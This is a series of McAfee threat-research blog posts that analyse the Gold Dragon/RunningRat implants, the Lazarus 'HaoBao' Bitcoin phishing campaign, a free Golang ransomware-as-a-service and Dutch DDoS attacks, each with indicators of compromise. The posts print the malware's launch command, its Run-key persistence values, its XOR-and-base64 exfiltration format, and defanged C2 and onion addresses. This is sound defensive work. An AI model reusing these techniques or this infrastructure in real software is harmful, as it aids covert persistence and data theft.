From our analysis, stealing keystrokes is the main function of RunningRat; however, the DLL has code for more extensive functionality. Code is included to copy the clipboard, delete files, compress files, clear event logs, shut down the machine, and much more. However, our current analysis shows no way for such code to be executed.

McAfee ATR analysts will continue to research RunningRat to determine if this extra code is used or is possibly left over from a larger RAT toolkit.

The second DLL employs a few additional antidebugging techniques. One is the use of a custom exception handler and code paths that are designed to generate exceptions.

There are also a few random empty-nested threads to slow down researchers during static analysis.

The final antidebugging technique involves GetTickCount performance counters, which are placed within the main sections of code to detect any delay a debugger adds during runtime.

Conclusion

The PowerShell script first discovered by McAfee ATR was delivered via a spear phishing campaign that used image stenography techniques to hide the first-stage implant. (For more on steganography, see the McAfee Labs Threats Report, June 2017, page 33.)

The implants covered in this research establish a permanent presence on the victim’s system once the PowerShell implant is executed. The implants are delivered as a second stage once the attacker gains an initial foothold using fileless malware. Some of the implants will maintain their persistence only if Hangul Word, which is specific to South Korea, is running.

With the discovery of these implants, we now have a better understanding of the scope of this operation. Gold Dragon, Brave Prince, Ghost419, and RunningRat demonstrate a much wider campaign than previously known. The persistent data exfiltration we see from these implants could give the attacker a potential advantage during the Olympics.

We thank Charles Crawford and Asheer Malhotra for their support of this analysis.

Indicators of Compromise

IPs

• 223.194.70.136

Domains

• trydai.000webhostapp.com
• follow_dai.000webhostapp.com
• eodo1.000webhostapp.com
• nid-help-pchange.atwebpages.com
• ink.inkboom.co.kr
• followgho.byethost7.com

Hashes

• fef671c13039df24e1606d5fdc65c92fbc1578d9
• 06948ab527ae415f32ed4b0f0d70be4a86b364a5
• 96a2fda8f26018724c86b275fe9396e24b26ec9e
• ad08a60dc511d9b69e584c1310dbd6039acffa0d
• c2f01355880cd9dfeef75cff189f4a8af421e0d3
• 615447f458463dc77f7ae3b0a4ad20ca2303027a
• bf21667e4b48b8857020ba455531c9c4f2560740
• bc6cb78e20cb20285149d55563f6fdcf4aaafa58
• 465d48ae849bbd6505263f3323e818ccb501ba88
• a9eb9a1734bb84bbc60df38d4a1e02a870962857
• 539acd9145befd7e670fe826c248766f46f0d041
• d63c7d7305a8b2184fff3b0941e596f09287aa66
• 35e5310b6183469f4995b7cd4f795da8459087a4
• 11a38a9d23193d9582d02ab0eae767c3933066ec
• e68f43ecb03330ff0420047b61933583b4144585
• 83706ddaa5ea5ee2cfff54b7c809458a39163a7a
• 3a0c617d17e7f819775e48f7edefe9af84a1446b
• 761b0690cd86fb472738b6dc32661ace5cf18893
• 7e74f034d8aa4570bd1b7dcfcdfaa52c9a139361
• 5e1326dd7122e2e2aed04ca4de180d16686853a7
• 6e13875449beb00884e07a38d0dd2a73afe38283
• 4f58e6a7a04be2b2ecbcdcbae6f281778fdbd9f9
• 389db34c3a37fd288e92463302629aa48be06e35
• 71f337dc65459027f4ab26198270368f68d7ae77
• 5a7fdfa88addb88680c2f0d5f7095220b4bbffc1

Indicators of Compromise for Feb. 12 update:

Hashes

•  Sha1: 7ae731d666e547b4f3442fe5675c8e8719d8d862

URLs

• hxxps://minibodegaslock.cl:443/components/com_tags/controllers/default_tags.php
• hxxps://minibodegaslock.cl/components/com_tags/controllers/access_log

The post Gold Dragon Widens Olympics Malware Attacks, Gains Permanent Presence on Victims’ Systems appeared first on McAfee Blogs.

This blog was written with support and contributions provided by Asheer Maholtra, Jessica Saavedra Morales, and Thomas Roccia.

McAfee Advanced Threat Research (ATR) analysts have discovered an aggressive Bitcoin-stealing phishing campaign by the international cybercrime group Lazarus that uses sophisticated malware with long-term impact.

This new campaign, dubbed HaoBao, resumes Lazarus’ previous phishing emails, posed as employee recruitment, but now targets Bitcoin users and global financial organizations. When victims open malicious documents attached to the emails, the malware scans for Bitcoin activity and then establishes an implant for long-term data-gathering.

HaoBao targets and never-before-seen implants signal to McAfee ATR an ambitious campaign by Lazarus to establish cryptocurrency cybercrime at a sophisticated level.

Background

Beginning in 2017, the Lazarus group heavily targeted individuals with spear phishing emails impersonating job recruiters which contained malicious documents. The campaign lasted from April to October and used job descriptions relevant to target organizations, in both English and Korean language. The objective was to gain access to the target’s environment and obtain key military program insight or steal money. The 2017 campaign targets ranged from defense contractors to financial institutions, including crypto currency exchanges, however; much of this fake job recruitment activity ceased months later, with the last activity observed October 22, 2017.

Analysis

On January 15^th , McAfee ATR discovered a malicious document masquerading as a job recruitment for a Business Development Executive located in Hong Kong for a large multi-national bank. The document was distributed via a Dropbox account at the following URL:

hxxps://www.dropbox.com/s/qje0yrz03au66d0/JobDescription.doc?dl=1

This is the mark of a new campaign, though it utilizes techniques, tactics and procedures observed in 2017. This document had the last author ‘Windows User’ and was created January 16, 2018 with Korean language resources. Several additional malicious documents with the same author appeared between January 16 though January 24, 2018.

Victims are persuaded to enable content through a notification claiming the document was created in an earlier version of Microsoft Word. The malicious documents then launch an implant on the victim’s system via a Visual Basic macro.

The document (7e70793c1ca82006775a0cac2bd75cc9ada37d7c) created January 24, 2018 drops and executes an implant compiled January 22, 2018 with the name lsm.exe (535f212b320df049ae8b8ebe0a4f93e3bd25ed79). The implant lsm.exe contacted 210.122.7.129 which also resolves to worker.co.kr.Implants dropped in campaign

The other malicious document ( a79488b114f57bd3d8a7fa29e7647e2281ce21f6) created January 19, 2018 drops the implant (afb2595ce1ecf0fdb9631752e32f0e32be3d51bb); which is 99% similar-to the lsm.exe implant.

This document was distributed from the following Dropbox URLs:

• hxxps://dl.dropboxusercontent.com/content_link/AKqqkZsJRuxz5VkEgcguqNE7Th3iscMsSYvivwzAYuTZQWDBLsbUb7yBdbW2lHos/file?dl=1
• hxxps://www.dropbox.com/s/q7w33sbdil0i1w5/job description.doc?dl=1

This implant (csrss.exe) compiled January 15, 2018 contacts an IP address 70.42.52.80 which resolves to deltaemis.com. We identified that this domain was used to host a malicious document from a previous 2017 campaign targeting the Sikorsky program.

• hxxp://deltaemis.com/CRCForm/3E_Company/Sikorsky/E4174/JobDescription.doc

A third malicious document (dc06b737ce6ada23b4d179d81dc7d910a7dbfdde) created January 19, 2018 drops e8faa68daf62fbe2e10b3bac775cce5a3bb2999e which is compiled January 15, 2018. This implant communicates to a South Korean IP address 221.164.168.185 which resolves to palgong-cc.co.kr.

McAfee ATR analysis finds the dropped implants have never been seen before in the wild and have not been used in previous Lazarus campaigns from 2017. Furthermore, this campaign deploys a one-time data gathering implant that relies upon downloading a second stage to gain persistence. The implants contain a hardcoded word “haobao” that is used as a switch when executing from the Visual Basic macro.

Malicious Document Analysis

The malicious document contains two payloads as encrypted string arrays embedded in Visual Basic macro code. The payloads are present as encrypted string arrays that are decrypted in memory, written to disk and launched in sequence (second stage malicious binary launched first and then the decoy document).

The VBA Macro code is self-executing and configured to execute when the OLE document (MS Word doc) is opened (via “Sub AutoOpen()”). The AutoOpen() function in the VBA Macro performs the following tasks in the sequence listed:

• Decodes the target file path of the second stage binary payload. This file path is calculated based on the current user’s Temp folder location:

<temp_dir_path>\.\lsm.exe

• Decodes the second stage binary in memory and writes it to the %temp%\.\lsm.exe file location

• After writing the second stage payload to disk the VBA code performs two important actions.
  • Runs the second stage payload using cmd.exe. This is done so that the cmd.exe process exists as soon as the payload is launched. This way a process enumeration tool cannot find the parent process => Smaller footprint.

cmdline for executing the second stage binary:

cmd.exe /c start /b <temp_dir_path>\.\lsm.exe /haobao

• Adds persistence on the system by creating a shortcut in the user’s Startup folder with the correct cmdline arguments:

Link file command line: <temp_dir_path>\.\lsm.exe /haobao

Link File Name: GoogleUpdate.lnk

• Once the second stage payload has been launched, the VBA Macro proceeds to display a decoy document to the end user. This decoy document is also stored in the VBA Macro as an encrypted string array (similar to the second stage payload). The decoy document is again written to the user’s temp directory to the following filename/path:

<temp_dir_path>\.\Job Description.doc

• Once the decoy document has been written to disk, the VBA Macro sets its file attributes to System + Hidden
• The decoy document is then opened by the malicious VBA Macro and the original malicious document’s caption is copied over to the decoy document to trick the end user into mistaking the decoy document for the original (malicious) document.
• This activity, combined with the fact that the VBA Macro then closes the current (malicious) document, indicates that the VBA Macro aims to trick an unsuspecting user into thinking that the decoy document currently open is the original (malicious) document opened by the user.
• Since the decoy document is a benign file and does not contain any macros the victim does not suspect any malicious behavior.

Implant Analysis

As part of the implant initialization activities the implant does the following;

• Checks the string passed to it through command line
  • “/haobao” in case of 535f212b320df049ae8b8ebe0a4f93e3bd25ed79
  • “/pumpingcore” in case of e8faa68daf62fbe2e10b3bac775cce5a3bb2999e

If the malware does not find this string in its cmdline arguments, it simply quits without going any further.

• Unwraps a DLL into memory and calls its one-and-only import using Reflective DLL injection. DLL information.

During our research, we discovered additional variants of the DLL file.

• As part of Reflective DLL loading the malware performs the following tasks on the DLL it has unwrapped in memory:
  • Copy the unwrapped DLL into new locations in its own memory space.
  • Build imports required by the DLL (based on the IAT of the DLL)

• Call the newly loaded DLL image’s Entry Point (DllMain) with DLL_PROCESS_ATTACH to complete successful loading of the DLL in the malware process.

• Call the actual malicious export in the DLL named “CoreDn”

All the malicious activities described below are performed by the DLL unless specified otherwise.

Data Reconnaissance

The implant has the capability of gathering data from the victim’s system. The following information will be gathered and sent to the command and control server.

• Computer name and currently logged on user’s name, stored in the format

<ComputerName> \ <Username>

• List of all processes currently running on the system arranged in format

<Process Name>\r\n

<Process Name>\r\n

<Process Name>\r\n

<Process Name>\r\n

• The presence of a specific registry key on the system

HKEY_CURRENT_USER\Software\Bitcoin\Bitcoin-Qt

• The malware appends an indicator (flag) specifying whether the above registry key was found in the user’s registry:

This key is checked again as part of the command and control communication and is sent as a duplicate value to the command and control in the HTTP POST request as well (explained in the below).

Exfiltration

Preparation

In preparation of the exfiltration of information collected from the endpoint, the malware performs the following activities:

• Encode the collected information using a simple byte based XOR operation using the byte key: 0x34.
• Base64 encode (standard) the XORed data.
• Again, check for the presence of the Registry Key: HKCU\Software\Bitcoin\Bitcoin-Qt

Command and Control Server Communication

Once the malware has performed all these activities it sends an HTTP POST request to the CnC server:

• www[dot]worker.co.kr for md5 BDAEDB14723C6C8A4688CC8FC1CFE668
• www[dot]palgong-cc.co.kr for md5 D4C93B85FFE88DDD552860B148831026

In the format:

HTTP POST to www[dot]worker.co.kr

/board2004/Upload/files/main.asp?idx=%d&no=%s&mode=%s

OR

HTTP POST to www[dot]palgong-cc.co.kr

/html/course/course05.asp?idx=%d&no=%s&mode=%s

where

idx= 20 (14h) if the Registry key does not exist; 24 (18h) if the key exists.

no= XORed + base64 encoded “<Computername> \ <username>”

mode= XORed + base64 encoded Process listing + Registry key flag

Persistence

The persistence mechanism of the malware is performed only for the downloaded implant. Persistence is established for the implant via the visual basic macro code initially executed upon document loading by the victim. This persistence is also performed ONLY if the malware successfully executes the downloaded implant. The malware first tries to update the HKEY_LOCAL_MACHINE registry key.

If the update is unsuccessful then it also tries to update the HKEY_CURRENT_USER registry key. Value written to registry to achieve persistence on the endpoint:

Registry Subkey = Software\Microsoft\Windows\CurrentVersion\Run

Value Name = AdobeFlash

Value Content = “C:\DOCUME~1\<username>\LOCALS~1\Temp\OneDrive.exe” kLZXlyJelgqUpKzP

Connections to 2017 campaigns

The techniques, tactics and procedures are very similar to the campaigns that targeted US Defense contractors, US Energy sector, financial organizations and crypto currency exchanges in 2017.

The same Windows User author appeared back in 2017 in two malicious documents 비트코인_지갑주소_및_거래번호.doc and 비트코인 거래내역.xls which were involved in crypto currency targeting. Furthermore, one of the implants communicates to an IP address that was involved in hosting malicious job description documents in 2017 involving the Sikorsky military program.

McAfee Advanced Threat research determines with confidence that Lazarus is the threat group behind this attack for the following reasons:

• Contacts an IP address / domain that was used to host a malicious document from a Lazarus previous campaign in 2017
• Same author appeared in these recent malicious documents that also appeared back in Lazarus 2017 campaigns
• Uses the same malicious document structure and similar job recruitment ads as what we observed in past Lazarus campaigns
• The techniques, tactics and procedures align with Lazarus group’s interest in crypto currency theft

Conclusion

In this latest discovery by McAfee ATR, despite a short pause in similar operations, the Lazarus group targets crypto currency and financial organizations. Furthermore, we have observed an increased usage of limited data gathering modules to quickly identify targets for further attacks. This campaign is tailored to identifying those who are running Bitcoin related software through specific system scans.

 Indicators of Compromise

MITRE ATT&CK techniques

• Data encoding
• Data encrypted
• Command-Line Interface
• Account discovery
• Process Discovery
• Query registry
• Hidden files and directories
• Custom cryptographic protocol
• Registry Run Keys / Start Folder
• Startup Items
• Commonly used port
• Exfiltration Over Command and Control Channel

IPs

• 210.122.7.129
• 70.42.52.80
• 221.164.168.185

URLs

• hxxps://dl.dropboxusercontent.com/content_link/AKqkZsJRuxz5VkEgcguqNE7Th3iscMsSYvivwzAYuTZQWDBLsbUb7yBdbW2lHos/file?dl=1
• hxxps://www.dropbox.com/s/q7w33sbdil0i1w5/job description.doc?dl=1

Hashes

• dc06b737ce6ada23b4d179d81dc7d910a7dbfdde
• a79488b114f57bd3d8a7fa29e7647e2281ce21f6
• 7e70793c1ca82006775a0cac2bd75cc9ada37d7c
• 535f212b320df049ae8b8ebe0a4f93e3bd25ed79
• 1dd8eba55b16b90f7e8055edca6f4957efb3e1cd
• afb2595ce1ecf0fdb9631752e32f0e32be3d51bb
• e8faa68daf62fbe2e10b3bac775cce5a3bb2999e

McAfee Detection

• BackDoor-FDRO!
• Trojan-FPCQ!
• RDN/Generic Downloader.x
• RDN/Generic Dropper
• RDN/Generic.dx

The post Lazarus Resurfaces, Targets Global Banks and Bitcoin Users appeared first on McAfee Blogs.

The McAfee Advanced Threat Research team recently analyzed a ransomware-as-a-service threat that is available for free and without registration. This malware was first seen in July 2017 with the extension .shifr. It has now appeared in recent detections with the extension .cypher.

Ransomware-as-a-Service

Ransomware-as-a-service is a cybercrime economic model that allows malware developers to earn money for their creations without the need to distribute their threats. Nontechnical criminals buy their wares and launch the infections, while paying the developers a percentage of their take. The developers run relatively few risks, and their customers do most of the work.

Some ransomware-as-a-service, such as RaaSberry, use subscriptions while others require registration to gain access to the ransomware. The ransomware developer hosts a service on the “dark web” that allows any buyer to create and modify the malware. For example, the buyer can add custom ransom notes and the amount of the payment. More advanced services offer features such as evasion techniques to avoid detection and analysis. The service can also offer a control server with an administration panel to manage each victim. This system is convenient for both the developer, who makes money by selling malware, and for buyers, who gain ready-to-deploy ransomware without needing any specific coding knowledge.

The underground economy behind this service is well organized, effectively offering a cybercrime infrastructure. Basically, the ransomware is available on a website. The buyer sets up the ransomware by adding a wallet address. The ransomware is then available to download. The buyer just needs to customize and spread the malware. When a victim pays the ransom, a percentage is delivered both to the buyer and to the malware coder.

The ransomware is available on the TOR network at hxxp://kdvm5fd6tn6jsbwh.onion. A web page guides buyers through the configuration process.

On the configuration page, a generic XMPP address suggests we may have found a demo version of the ransomware.

On the page, the buyer need only to add a Bitcoin wallet address and the amount of the ransom. Once that is done, the malware is generated and can be downloaded. With this malware, the developer earns a 10% commission on every payment. Now let’s look at the malware sample.

Dynamic Analysis 

When the malware launches on the victim’s system, it checks for an Internet connection. If there is none, it exits the process. Otherwise, it contacts the following addresses to download the encryption key:

Once the file is running, it creates several files on the system:

• Encryption_key: the RSA key encrypted in AES
• Lock_file: an indicator that the system is encrypted
• Uuid_file: a reference for the infected machine. A TOR address is generated with this ID.

The encryption key is downloaded from hxxps://kdvm5fd6tn6jsbwh.onion.to/new_c/xmKksHw53W433lmvNsdzGxqWLcPLA44Dyna.

The ransom note is created on the desktop.

The file “HOW_TO_DECRYPT_FILES.html” gives a link to the TOR network.

Once the files are encrypted, the ransom note is displayed in HTML and points to the TOR site hxxp://kdvm5fd6tn6jsbwh.onion/ with the ID of the infected machine.

Allegedly after payment, the victim can download the file decrypter.exe and unlock encrypted files, which have the extension .cypher.

The malware encrypts the following file extensions:

The targeted extensions include many picture and photography files related to Canon, Kodak, Sony, and others. There are also extensions for AutoCAD, Autodesk projects, scalable vector images, and Microsoft Office files. These files are mostly used by designers, photographers, architect—and many others.

Digging Deeper

The malware runs on 64-bit systems and is coded in Golang (“Go language,” from Google), a programming language similar to C with some improvements in error management. It is not common to find malware using Golang, although this is not the first time that we have analyzed such malware. This threat is pretty big compared with most other malware, larger than 5.5MB. The file size can make analysis more difficult and can also help evade hardcoded antimalware file-inspection sizes.

Reverse engineering in Golang is a bit different than other languages. Golang binaries are usually bigger than other executables. (By default, the compiler statically links the program’s libraries, resulting a bigger file.)

A drawback for attackers is that such big binaries can be easily detected on a corporate network. Large files are “noisier” and may appear suspicious when arriving from an external source. They can also be less convenient for attackers to deal with because they can make the infection process more difficult.

The first interesting function to analyze in a Golang binary is the “main_main.” The malware starts by gathering environment variables. It then checks whether the file “lock_file” exists in the directory C:\Users\<username>\AppData\Roaming.

The function “main_Exists” will check for the file. If it does not exist, the malware exits the process.

If the file does exist, the malware downloads the public key from the control server.

The malware contacts the address  hxxps://kdvm5fd6tn6jsbwh.onion/new_c/<nameofmalware>. The encryption public key is stored directly on the website.

This address is generated when the buyer creates the ransomware on the developer’s web page; thus the same malware encrypts files with the same public key.

The malware generates the AES key and tries to find any network share by querying the letters.

This function tries to find network shares:

Before a file is encrypted, the malware creates another file in C:\Users\<username>\AppData\Roaming\uuid_file to use as a victim identifier.

The malware encrypts the files using AES and deletes them after encryption with the function “os.remove” to avoid any simple forensic recovery.

The decrypter, which can be downloaded, works in a similar way but it requests the private key that the victims must pay for at hxxps://kdvm5fd6tn6jsbwh.onion.to/get_privkey/math/big. The mechanism behind the encryption routine seems to be on the online server and the decryption key cannot be easily recovered.

The following information describes the decrypter.

Conclusion

Cybercrime-as-a-service is not new, yet it is now more widespread than ever. In this case, the malware is available for free but the ransomware developer earns a 10% fee from each victim who pays a ransom. The use of Golang is not common for malware. Most ransomware-as-a-service is not free, which could indicate this might be a demonstration version, or a proof of concept for future sale.

This malware is not advanced and was coded without evasion techniques, such as DGA, SSL for control, encryption, or even file compression. Looking at the targeted file extensions suggests the victims can range from general home or business users to the graphics industry. Although such malware is not difficult to analyze, it can be very destructive in a corporate environment.

Keep in mind that paying a ransom is no guarantee of receiving a decryption key. McAfee advises that you never pay a ransom. You can find further information and help on unlocking some ransomware threats at https://www.nomoreransom.org.

McAfee detects this threat as Ransomware-FPDS!0F8CCEE515B8.

Indicators of Compromise

Hashes:

• cb73927aa749f88134ab7874b15df898c014a35d519469f59b1c85d32fa69357
• 0622fcb172773d8939b451c43902095b0f91877ae05e562c60d0ca0c237a2e9c

IP address:

• hxxp://kdvm5fd6tn6jsbwh.onion

Files created:

• C:\Users\<username>\AppData\Roaming\uuid_file
• C:\Users\<username>\AppData\Roaming\lock_file
• C:\Users\<username>\AppData\Roaming\encryption_key
• C:\Users\< username >\Desktop\HOW_TO_DECRYPT_FILES.html

Encryption extension:

• .cypher

References:

https://www.virustotal.com/en/file/0622fcb172773d8939b451c43902095b0f91877ae05e562c60d0ca0c237a2e9c/analysis/

https://isc.sans.edu/forums/diary/Ransomware+as+a+Service/23277/

The post Free Ransomware Available on Dark Web appeared first on McAfee Blogs.

At the end of January, the Netherlands was plagued by distributed denial of service (DDoS) attacks targeting various financial institutions, tech sites, and the Dutch tax authorities. At the time of the attacks it was unclear who was responsible, and this led to speculation among security experts.

Coincidentally, the attacks started a few days after it was announced in the media that the Dutch General Intelligence and Security Service, the AIVD, had played a major role in relaying crucial information to their American counterparts regarding attacks of suspected Russian state-sponsored hackers.

Thus, the hypothesis that the attacks were some kind a state-sponsored retaliation was quickly formed. Security experts deemed this hypothesis possible, but it remained unproven.

Arrest

Then on February 1, an 18-year-old suspect was arrested by the National High Tech Crime Unit of the Dutch police. The suspect carelessly left behind some crucial pieces of evidence, which ultimately led to his arrest. Through open-source research, the McAfee Advanced Threat Research team was also able to find links between the arrested suspect and another known DDoS actor. At this moment the police investigation is ongoing to determine the degree of guilt and whether the suspect acted independently. But one thing is certain: The wave of attacks has stopped since his arrest.

The relative ease with which the attack was carried out is striking. The individual had presumably bought a “stresser/booter service” capacity for about €40. The stresser enabled him to launch attacks with a volume of about 40Gbps.

(Stresser, or booter, services are websites that offer distributed denial of service capability as a paid service. These websites offer a way to stress-test a host by simply filling in its IP address. The traffic power these services need can be generated from legitimate or illegitimate sources. Attacking a host or website without legal consent is a highly illegal.)

McAfee Chief Scientist and Fellow Raj Samani has written “you can disrupt your competition for the price of a cup of coffee.” This attack suggests you can disrupt entire organizations or parts of a country for the price of a pound of good coffee beans.

Thus speculation of a possible state-sponsored retaliation dissolved into an inexpensive and relatively easy method of attack, performed by a teenager.

Earlier DDoS Attacks

This sequence of events reminds me of an earlier DDoS attack I personally investigated. In 2015 one of the largest internet service providers in the Netherlands suffered a DDoS attack for three consecutive days. This attack deprived roughly 1.8 million subscribers of Internet access. In a period of several weeks and after an extensive police investigation, a group of suspects was arrested. All but one of them were teenagers, with the youngest only 14 years old. Their methods were relatively simple as well, from basic Python scripts to the use of stresser/booter services.

I clearly recall that this group of suspects had a great affinity with online gaming. They were active on popular games such as Minecraft and Call of Duty and played a lot in groups or clans. Apparently, it was common practice for the suspects to knock their opponents offline during a game in order to win. Talk about fair play.

Could there be a connection between the gaming community and DDoS attacks, or is this purely a coincidence?

Gaming and DDoS

Who doesn’t remember the crippling Mirai DDoS attacks in the fall of 2016 on DNS provider Dyn, hosting provider OVH, and the popular security blog Krebs on Security?

Brian Krebs actively investigated the group behind the Mirai attacks against his site and published his findings online. During his research into the actors he described a fascinating world within the online gaming industry. In this industry it is big business to have powerful game servers, which attract many customers. This popularity makes those servers a target for the less successful, and their weapon of choice is often DDoS attacks. Game servers are apparently knocked offline daily to push gamers to migrate to the competition. All this distributed “violence” also gave birth to a lively and sometimes shady business in DDoS protection services.

So how would someone with only marginal technical knowledge go about knocking off websites? All it takes is simple search on one of the entry-level hacker forums. We found dozens of threads (some listed below) that discussed what it would take to attack (game) servers. Subsequently, the same forum was full of advertisements and reviews of various stresser and booter services offered online.

In February news surfaced that an online gaming service offered DDoS for hire. According to the article, the operators of a gaming service were behind the building of an IoT botnet named JenX and offered it as part of the game server rental scheme.

This shows there is a definite link between the online gaming community and the use of DDoS attacks. It is worrying to see that some individuals resort to such drastic measures out of pure frustration. We can only imagine the consequences when such an individual gets a low grade in school or has a disagreement with an online retailer.

End Note

As a former law enforcement official, I am troubled to see teenagers going down a criminal path. I can understand that for teens it is not always easy to foresee the consequences of their actions. One might think that knocking off websites is all fun and games or a way to show your frustration. But from my experience the fun definitely stops when the police come knocking at the door. Then it is literally game over.

The post DDoS Attacks in the Netherlands Reveal Teen Gamers on Troublesome Path appeared first on McAfee Blogs.